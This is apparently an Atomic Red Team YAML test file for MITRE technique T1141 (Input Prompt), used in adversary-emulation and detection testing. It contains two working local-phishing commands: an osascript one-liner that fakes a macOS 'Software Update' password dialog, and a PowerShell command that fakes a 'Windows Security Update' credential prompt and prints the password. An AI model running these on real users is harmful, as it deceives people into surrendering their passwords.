Carrie Roberts
1bfefdacfc
* provide elevation_required attribute * provide elevation_required attribute * provide elevation_required attribute
33 lines
1.2 KiB
YAML
33 lines
1.2 KiB
YAML
---
|
|
attack_technique: T1141
|
|
display_name: Input Prompt
|
|
|
|
atomic_tests:
|
|
- name: AppleScript - Prompt User for Password
|
|
description: |
|
|
Prompt User for Password (Local Phishing)
|
|
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
|
|
|
|
supported_platforms:
|
|
- macos
|
|
|
|
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
|
|
|
|
- name: PowerShell - Prompt User for Password
|
|
description: |
|
|
Prompt User for Password (Local Phishing) as seen in Stitch RAT.
|
|
|
|
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;} |